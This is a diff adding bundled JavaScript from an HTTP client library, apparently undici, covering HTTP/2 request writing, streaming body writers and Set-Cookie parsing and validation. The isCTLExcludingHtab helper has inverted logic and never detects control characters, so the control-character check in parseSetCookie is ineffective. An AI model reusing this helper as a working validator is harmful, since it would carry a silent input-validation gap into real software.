+ writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) + } else { + writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) + } + } else if (util.isStream(body)) { + writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) + } else if (util.isIterable(body)) { + writeIterable({ body, client, request, socket, contentLength, header, expectsPayload }) + } else { + assert(false) + } + + return true +} + +function writeH2 (client, session, request) { + const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request + + let headers + if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) + else headers = reqHeaders + + if (upgrade) { + errorRequest(client, request, new Error('Upgrade not supported for H2')) + return false + } + + try { + // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + /** @type {import('node:http2').ClientHttp2Stream} */ + let stream + const h2State = client[kHTTP2SessionState] + + headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] + headers[HTTP2_HEADER_METHOD] = method + + if (method === 'CONNECT') { + session.ref() + // we are already connected, streams are pending, first request + // will create a new stream. We trigger a request to create the stream and wait until + // `ready` event is triggered + // We disabled endStream to allow the user to write to the stream + stream = session.request(headers, { endStream: false, signal }) + + if (stream.id && !stream.pending) { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + } else { + stream.once('ready', () => { + request.onUpgrade(null, null, stream) + ++h2State.openStreams + }) + } + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) session.unref() + }) + + return true + } + + // https://tools.ietf.org/html/rfc7540#section-8.3 + // :path and :scheme headers must be omited when sending CONNECT + + headers[HTTP2_HEADER_PATH] = path + headers[HTTP2_HEADER_SCHEME] = 'https' + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + let contentLength = util.bodyLength(body) + + if (contentLength == null) { + contentLength = request.contentLength + } + + if (contentLength === 0 || !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + if (contentLength != null) { + assert(body, 'no body must not have content length') + headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` + } + + session.ref() + + const shouldEndStream = method === 'GET' || method === 'HEAD' + if (expectContinue) { + headers[HTTP2_HEADER_EXPECT] = '100-continue' + stream = session.request(headers, { endStream: shouldEndStream, signal }) + + stream.once('continue', writeBodyH2) + } else { + stream = session.request(headers, { + endStream: shouldEndStream, + signal + }) + writeBodyH2() + } + + // Increment counter as we have new several streams open + ++h2State.openStreams + + stream.once('response', headers => { + const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers + + if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { + stream.pause() + } + }) + + stream.once('end', () => { + request.onComplete([]) + }) + + stream.on('data', (chunk) => { + if (request.onData(chunk) === false) { + stream.pause() + } + }) + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) { + session.unref() + } + }) + + stream.once('error', function (err) { + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + stream.once('frameError', (type, code) => { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + errorRequest(client, request, err) + + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + // stream.on('aborted', () => { + // // TODO(HTTP/2): Support aborted + // }) + + // stream.on('timeout', () => { + // // TODO(HTTP/2): Support timeout + // }) + + // stream.on('push', headers => { + // // TODO(HTTP/2): Suppor push + // }) + + // stream.on('trailers', headers => { + // // TODO(HTTP/2): Support trailers + // }) + + return true + + function writeBodyH2 () { + /* istanbul ignore else: assertion */ + if (!body) { + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + stream.cork() + stream.write(body) + stream.uncork() + stream.end() + request.onBodySent(body) + request.onRequestSent() + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ + client, + request, + contentLength, + h2stream: stream, + expectsPayload, + body: body.stream(), + socket: client[kSocket], + header: '' + }) + } else { + writeBlob({ + body, + client, + request, + contentLength, + expectsPayload, + h2stream: stream, + header: '', + socket: client[kSocket] + }) + } + } else if (util.isStream(body)) { + writeStream({ + body, + client, + request, + contentLength, + expectsPayload, + socket: client[kSocket], + h2stream: stream, + header: '' + }) + } else if (util.isIterable(body)) { + writeIterable({ + body, + client, + request, + contentLength, + expectsPayload, + header: '', + h2stream: stream, + socket: client[kSocket] + }) + } else { + assert(false) + } + } +} + +function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') + + if (client[kHTTPConnVersion] === 'h2') { + // For HTTP/2, is enough to pipe the stream + const pipe = pipeline( + body, + h2stream, + (err) => { + if (err) { + util.destroy(body, err) + util.destroy(h2stream, err) + } else { + request.onRequestSent() + } + } + ) + + pipe.on('data', onPipeData) + pipe.once('end', () => { + pipe.removeListener('data', onPipeData) + util.destroy(pipe) + }) + + function onPipeData (chunk) { + request.onBodySent(chunk) + } + + return + } + + let finished = false + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + + const onData = function (chunk) { + if (finished) { + return + } + + try { + if (!writer.write(chunk) && this.pause) { + this.pause() + } + } catch (err) { + util.destroy(this, err) + } + } + const onDrain = function () { + if (finished) { + return + } + + if (body.resume) { + body.resume() + } + } + const onAbort = function () { + if (finished) { + return + } + const err = new RequestAbortedError() + queueMicrotask(() => onFinished(err)) + } + const onFinished = function (err) { + if (finished) { + return + } + + finished = true + + assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) + + socket + .off('drain', onDrain) + .off('error', onFinished) + + body + .removeListener('data', onData) + .removeListener('end', onFinished) + .removeListener('error', onFinished) + .removeListener('close', onAbort) + + if (!err) { + try { + writer.end() + } catch (er) { + err = er + } + } + + writer.destroy(err) + + if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { + util.destroy(body, err) + } else { + util.destroy(body) + } + } + + body + .on('data', onData) + .on('end', onFinished) + .on('error', onFinished) + .on('close', onAbort) + + if (body.resume) { + body.resume() + } + + socket + .on('drain', onDrain) + .on('error', onFinished) +} + +async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength === body.size, 'blob body must have content length') + + const isH2 = client[kHTTPConnVersion] === 'h2' + try { + if (contentLength != null && contentLength !== body.size) { + throw new RequestContentLengthMismatchError() + } + + const buffer = Buffer.from(await body.arrayBuffer()) + + if (isH2) { + h2stream.cork() + h2stream.write(buffer) + h2stream.uncork() + } else { + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(buffer) + socket.uncork() + } + + request.onBodySent(buffer) + request.onRequestSent() + + if (!expectsPayload) { + socket[kReset] = true + } + + resume(client) + } catch (err) { + util.destroy(isH2 ? h2stream : socket, err) + } +} + +async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') + + let callback = null + function onDrain () { + if (callback) { + const cb = callback + callback = null + cb() + } + } + + const waitForDrain = () => new Promise((resolve, reject) => { + assert(callback === null) + + if (socket[kError]) { + reject(socket[kError]) + } else { + callback = resolve + } + }) + + if (client[kHTTPConnVersion] === 'h2') { + h2stream + .on('close', onDrain) + .on('drain', onDrain) + + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + const res = h2stream.write(chunk) + request.onBodySent(chunk) + if (!res) { + await waitForDrain() + } + } + } catch (err) { + h2stream.destroy(err) + } finally { + request.onRequestSent() + h2stream.end() + h2stream + .off('close', onDrain) + .off('drain', onDrain) + } + + return + } + + socket + .on('close', onDrain) + .on('drain', onDrain) + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + if (!writer.write(chunk)) { + await waitForDrain() + } + } + + writer.end() + } catch (err) { + writer.destroy(err) + } finally { + socket + .off('close', onDrain) + .off('drain', onDrain) + } +} + +class AsyncWriter { + constructor ({ socket, request, contentLength, client, expectsPayload, header }) { + this.socket = socket + this.request = request + this.contentLength = contentLength + this.client = client + this.bytesWritten = 0 + this.expectsPayload = expectsPayload + this.header = header + + socket[kWriting] = true + } + + write (chunk) { + const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return false + } + + const len = Buffer.byteLength(chunk) + if (!len) { + return true + } + + // We should defer writing chunks. + if (contentLength !== null && bytesWritten + len > contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + socket.cork() + + if (bytesWritten === 0) { + if (!expectsPayload) { + socket[kReset] = true + } + + if (contentLength === null) { + socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') + } else { + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + } + } + + if (contentLength === null) { + socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') + } + + this.bytesWritten += len + + const ret = socket.write(chunk) + + socket.uncork() + + request.onBodySent(chunk) + + if (!ret) { + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + } + + return ret + } + + end () { + const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this + request.onRequestSent() + + socket[kWriting] = false + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return + } + + if (bytesWritten === 0) { + if (expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD send a Content-Length in a request message when + // no Transfer-Encoding is sent and the request method defines a meaning + // for an enclosed payload body. + + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + socket.write(`${header}\r\n`, 'latin1') + } + } else if (contentLength === null) { + socket.write('\r\n0\r\n\r\n', 'latin1') + } + + if (contentLength !== null && bytesWritten !== contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } else { + process.emitWarning(new RequestContentLengthMismatchError()) + } + } + + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + + resume(client) + } + + destroy (err) { + const { socket, client } = this + + socket[kWriting] = false + + if (err) { + assert(client[kRunning] <= 1, 'pipeline should only contain this request') + util.destroy(socket, err) + } + } +} + +function errorRequest (client, request, err) { + try { + request.onError(err) + assert(request.aborted) + } catch (err) { + client.emit('error', err) + } +} + +module.exports = Client + + +/***/ }), + +/***/ 6436: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/* istanbul ignore file: only for Node 12 */ + +const { kConnected, kSize } = __nccwpck_require__(2785) + +class CompatWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value[kConnected] === 0 && this.value[kSize] === 0 + ? undefined + : this.value + } +} + +class CompatFinalizer { + constructor (finalizer) { + this.finalizer = finalizer + } + + register (dispatcher, key) { + if (dispatcher.on) { + dispatcher.on('disconnect', () => { + if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { + this.finalizer(key) + } + }) + } + } +} + +module.exports = function () { + // FIXME: remove workaround when the Node bug is fixed + // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 + if (process.env.NODE_V8_COVERAGE) { + return { + WeakRef: CompatWeakRef, + FinalizationRegistry: CompatFinalizer + } + } + return { + WeakRef: global.WeakRef || CompatWeakRef, + FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer + } +} + + +/***/ }), + +/***/ 663: +/***/ ((module) => { + +"use strict"; + + +// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size +const maxAttributeValueSize = 1024 + +// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size +const maxNameValuePairSize = 4096 + +module.exports = { + maxAttributeValueSize, + maxNameValuePairSize +} + + +/***/ }), + +/***/ 1724: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { parseSetCookie } = __nccwpck_require__(4408) +const { stringify, getHeadersList } = __nccwpck_require__(3121) +const { webidl } = __nccwpck_require__(1744) +const { Headers } = __nccwpck_require__(554) + +/** + * @typedef {Object} Cookie + * @property {string} name + * @property {string} value + * @property {Date|number|undefined} expires + * @property {number|undefined} maxAge + * @property {string|undefined} domain + * @property {string|undefined} path + * @property {boolean|undefined} secure + * @property {boolean|undefined} httpOnly + * @property {'Strict'|'Lax'|'None'} sameSite + * @property {string[]} unparsed + */ + +/** + * @param {Headers} headers + * @returns {Record} + */ +function getCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookie = headers.get('cookie') + const out = {} + + if (!cookie) { + return out + } + + for (const piece of cookie.split(';')) { + const [name, ...value] = piece.split('=') + + out[name.trim()] = value.join('=') + } + + return out +} + +/** + * @param {Headers} headers + * @param {string} name + * @param {{ path?: string, domain?: string }|undefined} attributes + * @returns {void} + */ +function deleteCookie (headers, name, attributes) { + webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + name = webidl.converters.DOMString(name) + attributes = webidl.converters.DeleteCookieAttributes(attributes) + + // Matches behavior of + // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 + setCookie(headers, { + name, + value: '', + expires: new Date(0), + ...attributes + }) +} + +/** + * @param {Headers} headers + * @returns {Cookie[]} + */ +function getSetCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookies = getHeadersList(headers).cookies + + if (!cookies) { + return [] + } + + // In older versions of undici, cookies is a list of name:value. + return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? pair[1] : pair)) +} + +/** + * @param {Headers} headers + * @param {Cookie} cookie + * @returns {void} + */ +function setCookie (headers, cookie) { + webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + cookie = webidl.converters.Cookie(cookie) + + const str = stringify(cookie) + + if (str) { + headers.append('Set-Cookie', stringify(cookie)) + } +} + +webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + } +]) + +webidl.converters.Cookie = webidl.dictionaryConverter([ + { + converter: webidl.converters.DOMString, + key: 'name' + }, + { + converter: webidl.converters.DOMString, + key: 'value' + }, + { + converter: webidl.nullableConverter((value) => { + if (typeof value === 'number') { + return webidl.converters['unsigned long long'](value) + } + + return new Date(value) + }), + key: 'expires', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters['long long']), + key: 'maxAge', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'secure', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'httpOnly', + defaultValue: null + }, + { + converter: webidl.converters.USVString, + key: 'sameSite', + allowedValues: ['Strict', 'Lax', 'None'] + }, + { + converter: webidl.sequenceConverter(webidl.converters.DOMString), + key: 'unparsed', + defaultValue: [] + } +]) + +module.exports = { + getCookies, + deleteCookie, + getSetCookies, + setCookie +} + + +/***/ }), + +/***/ 4408: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) +const { isCTLExcludingHtab } = __nccwpck_require__(3121) +const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) +const assert = __nccwpck_require__(9491) + +/** + * @description Parses the field-value attributes of a set-cookie header string. + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} header + * @returns if the header is invalid, null will be returned + */ +function parseSetCookie (header) { + // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F + // character (CTL characters excluding HTAB): Abort these steps and + // ignore the set-cookie-string entirely. + if (isCTLExcludingHtab(header)) { + return null + } + + let nameValuePair = '' + let unparsedAttributes = '' + let name = '' + let value = '' + + // 2. If the set-cookie-string contains a %x3B (";") character: + if (header.includes(';')) { + // 1. The name-value-pair string consists of the characters up to, + // but not including, the first %x3B (";"), and the unparsed- + // attributes consist of the remainder of the set-cookie-string + // (including the %x3B (";") in question). + const position = { position: 0 } + + nameValuePair = collectASequenceOfCodePointsFast(';', header, position) + unparsedAttributes = header.slice(position.position) + } else { + // Otherwise: + + // 1. The name-value-pair string consists of all the characters + // contained in the set-cookie-string, and the unparsed- + // attributes is the empty string. + nameValuePair = header + } + + // 3. If the name-value-pair string lacks a %x3D ("=") character, then + // the name string is empty, and the value string is the value of + // name-value-pair. + if (!nameValuePair.includes('=')) { + value = nameValuePair + } else { + // Otherwise, the name string consists of the characters up to, but + // not including, the first %x3D ("=") character, and the (possibly + // empty) value string consists of the characters after the first + // %x3D ("=") character. + const position = { position: 0 } + name = collectASequenceOfCodePointsFast( + '=', + nameValuePair, + position + ) + value = nameValuePair.slice(position.position + 1) + } + + // 4. Remove any leading or trailing WSP characters from the name + // string and the value string. + name = name.trim() + value = value.trim() + + // 5. If the sum of the lengths of the name string and the value string + // is more than 4096 octets, abort these steps and ignore the set- + // cookie-string entirely. + if (name.length + value.length > maxNameValuePairSize) { + return null + } + + // 6. The cookie-name is the name string, and the cookie-value is the + // value string. + return { + name, value, ...parseUnparsedAttributes(unparsedAttributes) + } +} + +/** + * Parses the remaining attributes of a set-cookie header + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} unparsedAttributes + * @param {[Object.]={}} cookieAttributeList + */ +function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { + // 1. If the unparsed-attributes string is empty, skip the rest of + // these steps. + if (unparsedAttributes.length === 0) { + return cookieAttributeList + } + + // 2. Discard the first character of the unparsed-attributes (which + // will be a %x3B (";") character). + assert(unparsedAttributes[0] === ';') + unparsedAttributes = unparsedAttributes.slice(1) + + let cookieAv = '' + + // 3. If the remaining unparsed-attributes contains a %x3B (";") + // character: + if (unparsedAttributes.includes(';')) { + // 1. Consume the characters of the unparsed-attributes up to, but + // not including, the first %x3B (";") character. + cookieAv = collectASequenceOfCodePointsFast( + ';', + unparsedAttributes, + { position: 0 } + ) + unparsedAttributes = unparsedAttributes.slice(cookieAv.length) + } else { + // Otherwise: + + // 1. Consume the remainder of the unparsed-attributes. + cookieAv = unparsedAttributes + unparsedAttributes = '' + } + + // Let the cookie-av string be the characters consumed in this step. + + let attributeName = '' + let attributeValue = '' + + // 4. If the cookie-av string contains a %x3D ("=") character: + if (cookieAv.includes('=')) { + // 1. The (possibly empty) attribute-name string consists of the + // characters up to, but not including, the first %x3D ("=") + // character, and the (possibly empty) attribute-value string + // consists of the characters after the first %x3D ("=") + // character. + const position = { position: 0 } + + attributeName = collectASequenceOfCodePointsFast( + '=', + cookieAv, + position + ) + attributeValue = cookieAv.slice(position.position + 1) + } else { + // Otherwise: + + // 1. The attribute-name string consists of the entire cookie-av + // string, and the attribute-value string is empty. + attributeName = cookieAv + } + + // 5. Remove any leading or trailing WSP characters from the attribute- + // name string and the attribute-value string. + attributeName = attributeName.trim() + attributeValue = attributeValue.trim() + + // 6. If the attribute-value is longer than 1024 octets, ignore the + // cookie-av string and return to Step 1 of this algorithm. + if (attributeValue.length > maxAttributeValueSize) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 7. Process the attribute-name and attribute-value according to the + // requirements in the following subsections. (Notice that + // attributes with unrecognized attribute-names are ignored.) + const attributeNameLowercase = attributeName.toLowerCase() + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 + // If the attribute-name case-insensitively matches the string + // "Expires", the user agent MUST process the cookie-av as follows. + if (attributeNameLowercase === 'expires') { + // 1. Let the expiry-time be the result of parsing the attribute-value + // as cookie-date (see Section 5.1.1). + const expiryTime = new Date(attributeValue) + + // 2. If the attribute-value failed to parse as a cookie date, ignore + // the cookie-av. + + cookieAttributeList.expires = expiryTime + } else if (attributeNameLowercase === 'max-age') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 + // If the attribute-name case-insensitively matches the string "Max- + // Age", the user agent MUST process the cookie-av as follows. + + // 1. If the first character of the attribute-value is not a DIGIT or a + // "-" character, ignore the cookie-av. + const charCode = attributeValue.charCodeAt(0) + + if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 2. If the remainder of attribute-value contains a non-DIGIT + // character, ignore the cookie-av. + if (!/^\d+$/.test(attributeValue)) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 3. Let delta-seconds be the attribute-value converted to an integer. + const deltaSeconds = Number(attributeValue) + + // 4. Let cookie-age-limit be the maximum age of the cookie (which + // SHOULD be 400 days or less, see Section 4.1.2.2). + + // 5. Set delta-seconds to the smaller of its present value and cookie- + // age-limit. + // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) + + // 6. If delta-seconds is less than or equal to zero (0), let expiry- + // time be the earliest representable date and time. Otherwise, let + // the expiry-time be the current date and time plus delta-seconds + // seconds. + // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds + + // 7. Append an attribute to the cookie-attribute-list with an + // attribute-name of Max-Age and an attribute-value of expiry-time. + cookieAttributeList.maxAge = deltaSeconds + } else if (attributeNameLowercase === 'domain') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 + // If the attribute-name case-insensitively matches the string "Domain", + // the user agent MUST process the cookie-av as follows. + + // 1. Let cookie-domain be the attribute-value. + let cookieDomain = attributeValue + + // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be + // cookie-domain without its leading %x2E ("."). + if (cookieDomain[0] === '.') { + cookieDomain = cookieDomain.slice(1) + } + + // 3. Convert the cookie-domain to lower case. + cookieDomain = cookieDomain.toLowerCase() + + // 4. Append an attribute to the cookie-attribute-list with an + // attribute-name of Domain and an attribute-value of cookie-domain. + cookieAttributeList.domain = cookieDomain + } else if (attributeNameLowercase === 'path') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 + // If the attribute-name case-insensitively matches the string "Path", + // the user agent MUST process the cookie-av as follows. + + // 1. If the attribute-value is empty or if the first character of the + // attribute-value is not %x2F ("/"): + let cookiePath = '' + if (attributeValue.length === 0 || attributeValue[0] !== '/') { + // 1. Let cookie-path be the default-path. + cookiePath = '/' + } else { + // Otherwise: + + // 1. Let cookie-path be the attribute-value. + cookiePath = attributeValue + } + + // 2. Append an attribute to the cookie-attribute-list with an + // attribute-name of Path and an attribute-value of cookie-path. + cookieAttributeList.path = cookiePath + } else if (attributeNameLowercase === 'secure') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 + // If the attribute-name case-insensitively matches the string "Secure", + // the user agent MUST append an attribute to the cookie-attribute-list + // with an attribute-name of Secure and an empty attribute-value. + + cookieAttributeList.secure = true + } else if (attributeNameLowercase === 'httponly') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 + // If the attribute-name case-insensitively matches the string + // "HttpOnly", the user agent MUST append an attribute to the cookie- + // attribute-list with an attribute-name of HttpOnly and an empty + // attribute-value. + + cookieAttributeList.httpOnly = true + } else if (attributeNameLowercase === 'samesite') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 + // If the attribute-name case-insensitively matches the string + // "SameSite", the user agent MUST process the cookie-av as follows: + + // 1. Let enforcement be "Default". + let enforcement = 'Default' + + const attributeValueLowercase = attributeValue.toLowerCase() + // 2. If cookie-av's attribute-value is a case-insensitive match for + // "None", set enforcement to "None". + if (attributeValueLowercase.includes('none')) { + enforcement = 'None' + } + + // 3. If cookie-av's attribute-value is a case-insensitive match for + // "Strict", set enforcement to "Strict". + if (attributeValueLowercase.includes('strict')) { + enforcement = 'Strict' + } + + // 4. If cookie-av's attribute-value is a case-insensitive match for + // "Lax", set enforcement to "Lax". + if (attributeValueLowercase.includes('lax')) { + enforcement = 'Lax' + } + + // 5. Append an attribute to the cookie-attribute-list with an + // attribute-name of "SameSite" and an attribute-value of + // enforcement. + cookieAttributeList.sameSite = enforcement + } else { + cookieAttributeList.unparsed ??= [] + + cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) + } + + // 8. Return to Step 1 of this algorithm. + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) +} + +module.exports = { + parseSetCookie, + parseUnparsedAttributes +} + + +/***/ }), + +/***/ 3121: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kHeadersList } = __nccwpck_require__(2785) + +function isCTLExcludingHtab (value) { + if (value.length === 0) { + return false + } + + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + (code >= 0x00 || code <= 0x08) || + (code >= 0x0A || code <= 0x1F) || + code === 0x7F + ) { + return false + } + } +} + +/** + CHAR = + token = 1* + separators = "(" | ")" | "<" | ">" | "@" + | "," | ";" | ":" | "\" | <"> + | "/" | "[" | "]" | "?" | "=" + | "{" | "}" | SP | HT + * @param {string} name + */ +function validateCookieName (name) { + for (const char of name) { + const code = char.charCodeAt(0) + + if ( + (code <= 0x20 || code > 0x7F) || + char === '(' || + char === ')' || + char === '>' || + char === '<' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' || + char === '=' || + char === '{' || + char === '}' + ) { + throw new Error('Invalid cookie name') + } + } +} + +/** + cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) + cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E + ; US-ASCII characters excluding CTLs, + ; whitespace DQUOTE, comma, semicolon, + ; and backslash + * @param {string} value + */ +function validateCookieValue (value) { + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || // exclude CTLs (0-31) + code === 0x22 || + code === 0x2C || + code === 0x3B || + code === 0x5C || + code > 0x7E // non-ascii + ) { + throw new Error('Invalid header value') + } + } +} + +/** + * path-value = + * @param {string} path + */ +function validateCookiePath (path) { + for (const char of path) { + const code = char.charCodeAt(0) + + if (code < 0x21 || char === ';') { + throw new Error('Invalid cookie path') + } + } +} + +/** + * I have no idea why these values aren't allowed to be honest, + * but Deno tests these. - Khafra + * @param {string} domain + */ +function validateCookieDomain (domain) { + if ( + domain.startsWith('-') || + domain.endsWith('.') || + domain.endsWith('-') + ) { + throw new Error('Invalid cookie domain') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 + * @param {number|Date} date + IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT + ; fixed length/zone/capitalization subset of the format + ; see Section 3.3 of [RFC5322] + + day-name = %x4D.6F.6E ; "Mon", case-sensitive + / %x54.75.65 ; "Tue", case-sensitive + / %x57.65.64 ; "Wed", case-sensitive + / %x54.68.75 ; "Thu", case-sensitive + / %x46.72.69 ; "Fri", case-sensitive + / %x53.61.74 ; "Sat", case-sensitive + / %x53.75.6E ; "Sun", case-sensitive + date1 = day SP month SP year + ; e.g., 02 Jun 1982 + + day = 2DIGIT + month = %x4A.61.6E ; "Jan", case-sensitive + / %x46.65.62 ; "Feb", case-sensitive + / %x4D.61.72 ; "Mar", case-sensitive + / %x41.70.72 ; "Apr", 